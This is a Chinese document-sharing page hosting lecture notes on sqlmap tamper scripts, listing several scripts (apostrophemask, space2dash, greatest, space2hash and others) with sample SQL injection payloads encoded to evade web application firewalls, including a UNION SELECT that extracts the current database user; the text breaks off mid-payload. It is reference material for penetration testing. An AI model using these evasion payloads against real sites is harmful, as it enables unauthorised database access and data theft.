sqlmap绕过防火墙的脚本用法大全讲义.docVIP

sqlmap绕过防火墙的脚本用法大全讲义.doc

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
sqlmap绕过防火墙的脚本用法大全讲义

91Ri.org_我的安全攻防指南 分类浏览 CATEGORY Web安全?/ Web-Security 渗透实战?/ Pentest-Case Windows?/ Os Linux?/ Os 漏洞研究?/ Vulnerability 逆向工程?/ Reverse 国内资讯 国外资讯 神兵利器 窗体顶端 窗体底端 Sqlmap Tamper大全(1) sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。在许多情况下你可以通过使用sqlmap中的tamper脚本来对目标进行更高效的攻击。 本文旨在介绍tamper目录中的大部分插件,其中有的部分网上已经有了。 脚本名:apostrophemask.py 作用:用utf8代替引号 Example: Default 1 2 (1 AND 1=1) 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 Tested against: all ————————————————————————————— 文件名:equaltolike.py 作用:like 代替等号 Example: Default 1 2 * Input: SELECT * FROM users WHERE id=1 * Output: SELECT * FROM users WHERE id LIKE 1 Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 ————————————————————————————— 脚本名:space2dash.py 作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’) Example: Default 1 2 (1 AND 9227=9227) 1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227 Tested against: * MSSQL * SQLite ————————————————————————————— 脚本名:greatest.py 作用:绕过过滤’’ ,用GREATEST替换大于号。 Example: Default 1 2 (1 AND A gt; B) 1 AND GREATEST(A,B+1)=A Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 —————————————————— 脚本名:space2hash.py 作用:空格替换为#号 随机字符串 以及换行符 Example: Default 1 2 * Input: 1 AND 9227=9227 * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 Requirement: * MySQL Tested against: * MySQL 4.0, 5.0 —————————————————— 脚本名:apostrophenullencode.py 作用:绕过过滤双引号,替换字符和双引号。 Example: Default 1 2 tamper(1 AND 1=1) 1 AND %00%271%00%27=%00%271 Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 —————————————————— 脚本名:halfversionedmorekeywords.py 作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论 Example: Default 1 2 (value UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND QDWa=QDWa) value/*!0UNION/*!0ALL/*!0SELECT/*!0CONC

文档评论(0)

2299972 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档